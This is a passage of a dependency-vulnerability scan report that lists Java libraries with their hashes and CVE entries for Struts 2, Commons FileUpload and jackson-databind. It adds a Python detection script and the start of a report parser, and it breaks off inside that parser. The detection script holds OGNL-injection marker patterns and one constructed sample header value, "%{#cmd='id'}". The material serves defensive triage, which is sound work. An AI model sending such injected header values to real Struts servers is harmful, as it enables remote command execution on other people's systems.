SHA1: 6df31f97dfcde65c8dfea7fd5149dea2ee1ebd04
SHA256:b2aa4455b73aabfe1c428d03bd640e1785a30dbd583c5c60711a390902d5029e
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven.scm:maven-scm-provider-synergy:1.0  Confidence:Highest

jdom-1.0.jar

File Path: /Users/Kevin/.m2/repository/jdom/jdom/1.0/jdom-1.0.jar
MD5: 0b8f97de82fc9529b1028a77125ce4f8
SHA1: a2ac1cd690ab4c80defe7f9bce14d35934c35cec
SHA256:3b23bc3979aec14a952a12aafc483010dc57579775f2ffcacef5256a90eeda02
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: jdom:jdom:1.0  Confidence:Highest

jaxen-1.1-beta-8.jar

Description:

 Jaxen is a universal Java XPath engine.

File Path: /Users/Kevin/.m2/repository/jaxen/jaxen/1.1-beta-8/jaxen-1.1-beta-8.jar
MD5: f02f59d819544e8e6299b7010e98cc40
SHA1: b0bbd0cc28b4ec88b58d304896f7be7598e1c909
SHA256:b07b476859e37066ef04fcd98ef874bcbf5896c048ec99787e77aa15cc07e073
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: jaxen:jaxen:1.1-beta-8  Confidence:Highest

maven-release-manager-1.0-alpha-3.jar

File Path: /Users/Kevin/.m2/repository/org/apache/maven/release/maven-release-manager/1.0-alpha-3/maven-release-manager-1.0-alpha-3.jar
MD5: 8ccc6fdf4a3ba9b10b728e888605f0ee
SHA1: c1be3e419bd582928604fd553027bbd4b6b0c23e
SHA256:47bc0432a05253b8e81dba460cb3d8dfdf7d3077f7daa1e32367f50adee9cc6c
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.maven.release:maven-release-manager:1.0-alpha-3  Confidence:Highest

slf4j-api-1.5.6.jar

Description:

 The slf4j API

File Path: /Users/Kevin/.m2/repository/org/slf4j/slf4j-api/1.5.6/slf4j-api-1.5.6.jar
MD5: ca55c6dae5d0f9a8a829720408918586
SHA1: ec9b7142625dfa1dcaf22db99ecb7c555ffa714d
SHA256:b96864a2ad8c005d62351a500d72d2545b3bcb3e30564a64b0c467c935de8303
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.slf4j:slf4j-api:1.5.6  Confidence:Highest
  • cpe: cpe:/a:slf4j:slf4j:1.5.6  Confidence:Low  

jsr250-api-1.0.jar

Description:

 JSR-250 Reference Implementation by Glassfish

License:

COMMON DEVELOPMENT AND DISTRIBUTION LICENSE (CDDL) Version 1.0: https://glassfish.dev.java.net/public/CDDLv1.0.html
File Path: /Users/Kevin/.m2/repository/javax/annotation/jsr250-api/1.0/jsr250-api-1.0.jar
MD5: 4cd56b2e4977e541186de69f5126b4a6
SHA1: 5025422767732a1ab45d93abfea846513d742dcf
SHA256:a1a922d0d9b6d183ed3800dfac01d1e1eb159f0e8c6f94736931c1def54a941f
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: javax.annotation:jsr250-api:1.0  Confidence:Highest

continuum-buildagent-core-1.3.2.jar

File Path: /Users/Kevin/.m2/repository/org/apache/continuum/continuum-buildagent-core/1.3.2/continuum-buildagent-core-1.3.2.jar
MD5: 2aa60763500b161a291c0582c509c781
SHA1: 9bd9b0b3c488a33a7501eea4b1850d8fe31f452a
SHA256:22efdf61cebc17fc79ae1e2bcf4de505cbbad6d9ea2cebb874678fbfa740b6a6
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.continuum:continuum-buildagent-core:1.3.2  Confidence:Highest
  • cpe: cpe:/a:apache:continuum:1.3.2  Confidence:Low  

lz4-1.1.2.jar

Description:

 Java ports and bindings of the LZ4 compression algorithm and the xxHash hashing algorithm

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/net/jpountz/lz4/lz4/1.1.2/lz4-1.1.2.jar
MD5: 3ba70aef4e8a60aa60c8d1f00c8ea357
SHA1: b9bf619cffac8585ec1877ebf876ec68c85fc980
SHA256:9879a63b4f952f5db1bc322eb99f872a36df7fbc24b56469caa4b234fbba4160
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: net.jpountz.lz4:lz4:1.1.2  Confidence:Highest

asm-3.3.jar

File Path: /Users/Kevin/.m2/repository/asm/asm/3.3/asm-3.3.jar
MD5: 968575ef15e4024d205fa6ecddec67a9
SHA1: fb0f302a91a376fd5cfe23167c419375e8fc9b8f
SHA256:07e685c385c652a3d2c4a08312004f653ba508e325d70ff3d9e8687d1ac6a8da
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: asm:asm:3.3  Confidence:Highest

asm-tree-3.3.jar

File Path: /Users/Kevin/.m2/repository/asm/asm-tree/3.3/asm-tree-3.3.jar
MD5: 3eeafc985d3ca624abf2d3ad549180d0
SHA1: 33c13070f194e1f0385877ec9306a24e983b00e3
SHA256:d0d8a92d855a015db402675af123c8f39010501ba1d34a5072301ce6caf137ea
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: asm:asm-tree:3.3  Confidence:Highest

asm-commons-3.3.jar

File Path: /Users/Kevin/.m2/repository/asm/asm-commons/3.3/asm-commons-3.3.jar
MD5: 47d6178194c38fc70d4e27db08ae5d10
SHA1: 3630d2095238beee3f94670af3d9a9dc115ce887
SHA256:1cc6e5bcfab550397289875ac133d86562d4ec2f3875afa7c5c033d1f0ee96af
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: asm:asm-commons:3.3  Confidence:Highest

xwork-core-2.3.24.jar

Description:

 Apache Struts 2

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/struts/xwork/xwork-core/2.3.24/xwork-core-2.3.24.jar
MD5: bf93d0ee8ed38a7353ba1ca0c15e20b5
SHA1: 2494f67f3e7f91e06a48e739b772e8dd283bb52e
SHA256:fa9a0cae06a735123459ad9df26463dc12658788eb35db19b0434dad9f826db6
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.struts.xwork:xwork-core:2.3.24  Confidence:Highest

freemarker-2.3.22.jar

Description:

 FreeMarker is a "template engine"; a generic tool to generate text output based on templates.

License:

Apache License, Version 2.0: http://freemarker.org/LICENSE.txt
File Path: /Users/Kevin/.m2/repository/org/freemarker/freemarker/2.3.22/freemarker-2.3.22.jar
MD5: 51cca65040c41326e9b6b2806aba23ff
SHA1: 473d784b3cd2dcb6d49a287ded0542b7862c7d68
SHA256:58502c0e47066cfde399d52aa5d81f83f990bbb43b044414969119c25c1a9c6f
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.freemarker:freemarker:2.3.22  Confidence:Highest

javassist-3.11.0.GA.jar

Description:

 Javassist (JAVA programming ASSISTant) makes Java bytecode manipulation simple. It is a class library for editing bytecodes in Java.

File Path: /Users/Kevin/.m2/repository/javassist/javassist/3.11.0.GA/javassist-3.11.0.GA.jar
MD5: cb8f91e65864b85c8c6f87164e3252a5
SHA1: 2c00105734a57e9ee4f27e4b17cd43200e5f0ff8
SHA256:aa8c27fc46be68c58c25eab15bf3073587945e009455385da78439dea684ef58
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: javassist:javassist:3.11.0.GA  Confidence:Highest

ognl-3.0.6.jar

Description:

 OGNL - Object Graph Navigation Library

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/ognl/ognl/3.0.6/ognl-3.0.6.jar
MD5: 2a8fb06b52574e498ed256b8fc64055e
SHA1: a3665cf8e3426686ee751790f3d1e1ec5705e9dc
SHA256:3e9c7968f61371bb231df316123e6740944f72b59675843574c2f42d5e9f33cb
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:ognl_project:ognl:3.0.6  Confidence:Low  
  • maven: ognl:ognl:3.0.6  Confidence:Highest

CVE-2016-3093  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-20 Improper Input Validation

Apache Struts 2.0.0 through 2.3.24.1 does not properly cache method references when used with OGNL before 3.0.12, which allows remote attackers to cause a denial of service (block access to a web site) via unspecified vectors.

Vulnerable Software & Versions:

commons-fileupload-1.3.1.jar

Description:

 The Apache Commons FileUpload component provides a simple yet flexible means of adding support for multipart file upload functionality to servlets and web applications.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/commons-fileupload/commons-fileupload/1.3.1/commons-fileupload-1.3.1.jar
MD5: ed8eec445e21ec7e49b86bf3cbcffcbc
SHA1: c621b54583719ac0310404463d6d99db27e1052c
SHA256:f4ae31866d62f91054fb3dfd0696efd08705e5e8ccd657b01b460a80044be532
Referenced In Project/Scope:trial:compile

Identifiers

CVE-2016-1000031  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-284 Improper Access Control

Apache Commons FileUpload before 1.3.3 DiskFileItem File Manipulation Remote Code Execution

Vulnerable Software & Versions:

CVE-2016-3092  

Severity:High
CVSS Score: 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)
CWE: CWE-20 Improper Input Validation

The MultipartStream class in Apache Commons Fileupload before 1.3.2, as used in Apache Tomcat 7.x before 7.0.70, 8.x before 8.0.36, 8.5.x before 8.5.3, and 9.x before 9.0.0.M7 and other products, allows remote attackers to cause a denial of service (CPU consumption) via a long boundary string.

Vulnerable Software & Versions:

commons-io-2.2.jar

Description:

 The Commons IO library contains utility classes, stream implementations, file filters, file comparators, endian transformation classes, and much more.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/commons-io/commons-io/2.2/commons-io-2.2.jar
MD5: 6ad49e3e16c2342e9ee9599ce04775e6
SHA1: 83b5b8a7ba1c08f9e8c8ff2373724e33d3c1e22a
SHA256:675f60bd11a82d481736591fe4054c66471fa5463d45616652fd71585792ba87
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: commons-io:commons-io:2.2  Confidence:Highest

struts2-core-2.3.24.jar

Description:

 Apache Struts 2

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/struts/struts2-core/2.3.24/struts2-core-2.3.24.jar
MD5: f5c4aa120f74452cc8d3e2ba08c59208
SHA1: d1baacd603b0fa91217cb3552ae1577b18b5da27
SHA256:432247b4b7f68ba33abdaf3db3000adcdc30997b20ef0f00e51813293829ab7d
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.struts:struts2-core:2.3.24  Confidence:Highest
  • cpe: cpe:/a:apache:struts:2.3.24  Confidence:Highest  

CVE-2015-5209  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-20 Improper Input Validation

Apache Struts 2.x before 2.3.24.1 allows remote attackers to manipulate Struts internals, alter user sessions, or affect container settings via vectors involving a top object.

Vulnerable Software & Versions:

CVE-2016-0785  

Severity:High
CVSS Score: 9.0 (AV:N/AC:L/Au:S/C:C/I:C/A:C)
CWE: CWE-20 Improper Input Validation

Apache Struts 2.x before 2.3.28 allows remote attackers to execute arbitrary code via a "%{}" sequence in a tag attribute, aka forced double OGNL evaluation.

Vulnerable Software & Versions:

CVE-2016-2162  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Apache Struts 2.x before 2.3.25 does not sanitize text in the Locale object constructed by I18NInterceptor, which might allow remote attackers to conduct cross-site scripting (XSS) attacks via unspecified vectors involving language display.

Vulnerable Software & Versions:

CVE-2016-3081  

Severity:High
CVSS Score: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
CWE: CWE-77 Improper Neutralization of Special Elements used in a Command ('Command Injection')

Apache Struts 2.x before 2.3.20.2, 2.3.24.x before 2.3.24.2, and 2.3.28.x before 2.3.28.1, when Dynamic Method Invocation is enabled, allow remote attackers to execute arbitrary code via method: prefix, related to chained expressions.

Vulnerable Software & Versions:

CVE-2016-3082  

Severity:High
CVSS Score: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
CWE: CWE-20 Improper Input Validation

XSLTResult in Apache Struts 2.x before 2.3.20.2, 2.3.24.x before 2.3.24.2, and 2.3.28.x before 2.3.28.1 allows remote attackers to execute arbitrary code via the stylesheet location parameter.

Vulnerable Software & Versions:

CVE-2016-3087  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-20 Improper Input Validation

Apache Struts 2.3.20.x before 2.3.20.3, 2.3.24.x before 2.3.24.3, and 2.3.28.x before 2.3.28.1, when Dynamic Method Invocation is enabled, allow remote attackers to execute arbitrary code via vectors related to an ! (exclamation mark) operator to the REST Plugin.

Vulnerable Software & Versions:

CVE-2016-3093  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-20 Improper Input Validation

Apache Struts 2.0.0 through 2.3.24.1 does not properly cache method references when used with OGNL before 3.0.12, which allows remote attackers to cause a denial of service (block access to a web site) via unspecified vectors.

Vulnerable Software & Versions:

CVE-2016-4003  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Cross-site scripting (XSS) vulnerability in the URLDecoder function in JRE before 1.8, as used in Apache Struts 2.x before 2.3.28, when using a single byte page encoding, allows remote attackers to inject arbitrary web script or HTML via multi-byte characters in a url-encoded parameter.

Vulnerable Software & Versions:

CVE-2016-4430  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-352 Cross-Site Request Forgery (CSRF)

Apache Struts 2 2.3.20 through 2.3.28.1 mishandles token validation, which allows remote attackers to conduct cross-site request forgery (CSRF) attacks via unspecified vectors.

Vulnerable Software & Versions:

CVE-2016-4431  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-20 Improper Input Validation

Apache Struts 2 2.3.20 through 2.3.28.1 allows remote attackers to bypass intended access restrictions and conduct redirection attacks by leveraging a default method.

Vulnerable Software & Versions:

CVE-2016-4433  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-20 Improper Input Validation

Apache Struts 2 2.3.20 through 2.3.28.1 allows remote attackers to bypass intended access restrictions and conduct redirection attacks via a crafted request.

Vulnerable Software & Versions:

CVE-2016-4436  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)

Apache Struts 2 before 2.3.29 and 2.5.x before 2.5.1 allow attackers to have unspecified impact via vectors related to improper action name clean up.

Vulnerable Software & Versions:

CVE-2016-4438  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-20 Improper Input Validation

The REST plugin in Apache Struts 2 2.3.20 through 2.3.28.1 allows remote attackers to execute arbitrary code via a crafted expression.

Vulnerable Software & Versions:

CVE-2016-4465  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-20 Improper Input Validation

The URLValidator class in Apache Struts 2 2.3.20 through 2.3.28.1 and 2.5.x before 2.5.1 allows remote attackers to cause a denial of service via a null value for a URL field.

Vulnerable Software & Versions:

CVE-2016-6795  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

In the Convention plugin in Apache Struts 2.3.20 through 2.3.30, it is possible to prepare a special URL which will be used for path traversal and execution of arbitrary code on server side.

Vulnerable Software & Versions:

CVE-2017-5638  

Severity:High
CVSS Score: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
CWE: CWE-20 Improper Input Validation

The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.

Vulnerable Software & Versions:

CVE-2017-9787  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-284 Improper Access Control

When using a Spring AOP functionality to secure Struts actions it is possible to perform a DoS attack. Solution is to upgrade to Apache Struts version 2.5.12 or 2.3.33.

Vulnerable Software & Versions:

CVE-2017-9791  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-20 Improper Input Validation

The Struts 1 plugin in Apache Struts 2.3.x might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage.

Vulnerable Software & Versions:

CVE-2017-9805  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-502 Deserialization of Untrusted Data

The REST Plugin in Apache Struts 2.1.2 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads.

Vulnerable Software & Versions:

CVE-2018-11776  

Severity:High
CVSS Score: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
CWE: CWE-20 Improper Input Validation

Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn't have value and action set and in same time, its upper package have no or wildcard namespace.

Vulnerable Software & Versions:

CVE-2018-1327  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-20 Improper Input Validation

The Apache Struts REST Plugin is using XStream library which is vulnerable and allow perform a DoS attack when using a malicious request with specially crafted XML payload. Upgrade to the Apache Struts version 2.5.16 and switch to an optional Jackson XML handler as described here http://struts.apache.org/plugins/rest/#custom-contenttypehandlers. Another option is to implement a custom XML handler based on the Jackson XML handler from the Apache Struts 2.5.16.

Vulnerable Software & Versions:
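Two of the findings in this report describe their request-level trigger precisely enough to look for in traffic while the upgrade is pending: CVE-2017-5638 above (a Content-Type header carrying an OGNL expression, exploited in the wild with a "#cmd=" string; "%{" is the OGNL delimiter the CVE-2016-0785 text also names) and CVE-2016-3092 in the commons-fileupload entry further up (CPU exhaustion from an over-long multipart boundary). The following detection script is an added example, not part of the report, of Struts or of Commons FileUpload, and serves both findings. It inspects Content-Type values taken from access-log lines in a constructed layout (combined log format with the request Content-Type appended as a final quoted field; that your proxy logs the header at all is an assumption) and flags the OGNL markers and any boundary longer than the 70-character limit RFC 2046 sets. The sample log lines are constructed and carry no working payload.

```python
import re

# Indicators taken from the CVE texts in this report: CVE-2017-5638 was exploited
# through a Content-Type header carrying an OGNL expression ("%{" ... "#cmd="), and
# CVE-2016-3092 is a CPU-exhaustion bug triggered by an over-long multipart boundary.
OGNL_MARKERS = re.compile(r"%\{|#cmd=", re.IGNORECASE)
_BOUNDARY = re.compile(r'boundary=(?:"([^"]*)"|([^;]*))', re.IGNORECASE)
MAX_BOUNDARY_LEN = 70  # RFC 2046 section 5.1.1: a boundary is 1 to 70 characters

# Constructed log layout (an assumption, not any server's default): combined log
# format with the request Content-Type appended as a final quoted field.
_LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ctype>.*)"$'
)

# Constructed sample lines: one benign upload, one OGNL marker, one over-long boundary,
# one request without a Content-Type.
SAMPLE_LOG = [
    '203.0.113.7 - - [08/Mar/2017:10:00:01 +0000] "POST /upload.action HTTP/1.1" 200 512 '
    '"multipart/form-data; boundary=----WebKitFormBoundaryAbC123"',
    '203.0.113.9 - - [08/Mar/2017:10:00:02 +0000] "POST /upload.action HTTP/1.1" 500 0 '
    '"%{#cmd=\'id\'}"',
    '198.51.100.4 - - [08/Mar/2017:10:00:03 +0000] "POST /upload.action HTTP/1.1" 503 0 '
    '"multipart/form-data; boundary=' + "A" * 4096 + '"',
    '198.51.100.5 - - [08/Mar/2017:10:00:04 +0000] "GET /index.action HTTP/1.1" 200 1024 "-"',
]


def inspect_content_type(value):
    """Findings for one Content-Type header value (empty list = nothing suspicious)."""
    findings = []
    if OGNL_MARKERS.search(value):
        findings.append("ognl-marker-in-content-type")
    m = _BOUNDARY.search(value)
    if m:
        boundary = (m.group(1) if m.group(1) is not None else m.group(2)).strip()
        if not boundary:
            findings.append("empty-multipart-boundary")
        elif len(boundary) > MAX_BOUNDARY_LEN:
            findings.append(f"multipart-boundary-too-long:{len(boundary)}")
    return findings


def scan_log(lines):
    """Return (client_ip, request_line, findings) for every log line with a finding."""
    hits = []
    for line in lines:
        m = _LOG_LINE.match(line)
        if not m:
            continue  # a line in another layout is skipped rather than misparsed
        findings = inspect_content_type(m.group("ctype"))
        if findings:
            hits.append((m.group("ip"), m.group("req"), findings))
    return hits


if __name__ == "__main__":
    for ip, req, findings in scan_log(SAMPLE_LOG):
        print(ip, req, findings)
```

Most servers do not log request headers by default, so the Content-Type field has to be added to the log format before this is useful for scoping an incident. It is a triage heuristic, not a mitigation: the CVE-2017-5638 text lists Content-Disposition and Content-Length as further vectors, and neither is normally logged, so an absence of hits says little about whether the host was attacked.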

commons-collections4-4.1.jar

Description:

 The Apache Commons Collections package contains types that extend and augment the Java Collections Framework.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/commons/commons-collections4/4.1/commons-collections4-4.1.jar
MD5: 45af6a8e5b51d5945de6c7411e290bd1
SHA1: a4cf4688fe1c7e3a63aa636cc96d013af537768e
SHA256:b1fe8b5968b57d8465425357ed2d9dc695504518bed2df5b565c4b8e68c1c8a5
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.commons:commons-collections4:4.1  Confidence:Highest
  • cpe: cpe:/a:apache:commons_collections:4.1  Confidence:Low  

wicket-core-7.10.0.jar

Description:

 Wicket is a Java web application framework that takes simplicity, separation of concerns and ease of development to a whole new level. Wicket pages can be mocked up, previewed and later revised using standard WYSIWYG HTML design tools. Dynamic content processing and form handling is all handled in Java code using a first-class component model backed by POJO data beans that can easily be persisted using your favorite technology.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/wicket/wicket-core/7.10.0/wicket-core-7.10.0.jar
MD5: f86b98c2b4c61cf1c344b9f294f08138
SHA1: ff61b2fb5a43947a9b94556d505bd708a663e003
SHA256:873518141d218016338c67b18414706532d96486e91a96ff149b9c1d01ab5713
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.wicket:wicket-core:7.10.0  Confidence:Highest
  • cpe: cpe:/a:apache:wicket:7.10.0  Confidence:Low  

findbugs-annotations-1.3.9-1.jar

Description:

 A clean room implementation of the Findbugs Annotations based entirely on the specification provided by the javadocs and at http://findbugs.sourceforge.net/manual/annotations.html.

License:

Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/com/github/stephenc/findbugs/findbugs-annotations/1.3.9-1/findbugs-annotations-1.3.9-1.jar
MD5: 70fda5202eb9d9ce4f250f2c2ba71152
SHA1: a6b11447635d80757d64b355bed3c00786d86801
SHA256:1e651066ed9ae35d7e3001d635d1dbba1c2965db0e4e33e2c14ad610543f225c
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: com.github.stephenc.findbugs:findbugs-annotations:1.3.9-1  Confidence:Highest

jgroups-3.6.10.Final.jar

Description:

 Reliable cluster communication toolkit

License:

Apache License 2.0: http://www.apache.org/licenses/LICENSE-2.0.html
File Path: /Users/Kevin/.m2/repository/org/jgroups/jgroups/3.6.10.Final/jgroups-3.6.10.Final.jar
MD5: 54b56e09dd1583a0b07b113ddeeb3604
SHA1: fc0ff5a8a9de27ab62939956f705c2909bf86bc2
SHA256:46ddfd9d0c0c75b5dab967bb81a97efbe14f5b629ae590a633a4e983f5ea67de
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.jgroups:jgroups:3.6.10.Final  Confidence:Highest

antlr-2.7.7.jar

Description:

 A framework for constructing recognizers, compilers, and translators from grammatical descriptions containing Java, C#, C++, or Python actions.

License:

BSD License: http://www.antlr.org/license.html
File Path: /Users/Kevin/.m2/repository/antlr/antlr/2.7.7/antlr-2.7.7.jar
MD5: f8f1352c52a4c6a500b597596501fc64
SHA1: 83cd2cd674a217ade95a4bb83a8a14f351f48bd0
SHA256:88fbda4b912596b9f56e8e12e580cc954bacfb51776ecfddd3e18fc1cf56dc4c
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: antlr:antlr:2.7.7  Confidence:Highest

jackson-annotations-2.8.6.jar

Description:

 Core annotations used for value types, used by Jackson data binding package.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/com/fasterxml/jackson/core/jackson-annotations/2.8.6/jackson-annotations-2.8.6.jar
MD5: 10b5d9fc0ab28d74ea1ef40988c7964d
SHA1: 9577018f9ce3636a2e1cb0a0c7fe915e5098ded5
SHA256:92d7580f361174bda3e015c66adafa326aeb9ef7f4a99a895486cef0dae773f8
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:fasterxml:jackson:2.8.6  Confidence:Low  
  • maven: com.fasterxml.jackson.core:jackson-annotations:2.8.6  Confidence:Highest

jackson-databind-2.8.6.jar

Description:

 General data-binding functionality for Jackson: works on core streaming API

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/com/fasterxml/jackson/core/jackson-databind/2.8.6/jackson-databind-2.8.6.jar
MD5: b9bcc79b8b3883f627045b2da535e580
SHA1: c43de61f74ecc61322ef8f402837ba65b0aa2bf4
SHA256:922413ca2ff5a8f1f86a2eaae8ff02219322ec6ff00d212e7973df8aac4bbaa3
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: com.fasterxml.jackson.core:jackson-databind:2.8.6  Confidence:Highest
  • cpe: cpe:/a:fasterxml:jackson:2.8.6  Confidence:Low  
  • cpe: cpe:/a:fasterxml:jackson-databind:2.8.6  Confidence:Highest  

CVE-2017-15095  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-502 Deserialization of Untrusted Data

A deserialization flaw was discovered in the jackson-databind in versions before 2.8.10 and 2.9.1, which could allow an unauthenticated user to perform code execution by sending the maliciously crafted input to the readValue method of the ObjectMapper. This issue extends the previous flaw CVE-2017-7525 by blacklisting more classes that could be used maliciously.

Vulnerable Software & Versions:

CVE-2017-17485  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-502 Deserialization of Untrusted Data

FasterXML jackson-databind through 2.8.10 and 2.9.x through 2.9.3 allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the Spring libraries are available in the classpath.

Vulnerable Software & Versions:

CVE-2017-7525  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-502 Deserialization of Untrusted Data

A deserialization flaw was discovered in the jackson-databind, versions before 2.6.7.1, 2.7.9.1 and 2.8.9, which could allow an unauthenticated user to perform code execution by sending the maliciously crafted input to the readValue method of the ObjectMapper.

Vulnerable Software & Versions:

CVE-2018-5968  

Severity:Medium
CVSS Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
CWE: CWE-184 Incomplete Blacklist

FasterXML jackson-databind through 2.8.11 and 2.9.x through 2.9.3 allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 and CVE-2017-17485 deserialization flaws. This is exploitable via two different gadgets that bypass a blacklist.

Vulnerable Software & Versions:

CVE-2018-7489  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-184 Incomplete Blacklist

FasterXML jackson-databind before 2.8.11.1 and 2.9.x before 2.9.5 allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the c3p0 libraries are available in the classpath.

Vulnerable Software & Versions:
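Read one entry at a time, the layout above is clear; acted on across the whole dependency list it is not, because the questions a practitioner asks (which jars carry the highest CVSS, which findings are remote-code-execution class, which CPE matches were made at Low confidence and so deserve a second look before anyone files a ticket) cut across entries. The parser below is an added example and not part of Dependency-Check, which can also emit JSON or XML directly for this purpose; it reads the text layout used on this page, ranks dependencies by their highest CVSS, flags RCE-class findings (CWE-502, or a description that names code execution), and lists the Low-confidence CPE identifiers. The sample input is a constructed excerpt of this page's jackson-databind and slf4j-api entries; the RCE heuristic and the treatment of CWE-502 as RCE-class are this example's choices, not the tool's.

```python
import re
from dataclasses import dataclass, field

# Line shapes of the text rendering used on this page.
_DEP_HEADING = re.compile(r"^(\S+\.jar)$")
_CVE_HEADING = re.compile(r"^(CVE-\d{4}-\d{4,})$")
_IDENTIFIER = re.compile(r"^•\s*(\w+):\s*(\S+)\s+Confidence:\s*(\w+)")
_SEVERITY = re.compile(r"^Severity:\s*(\w+)")
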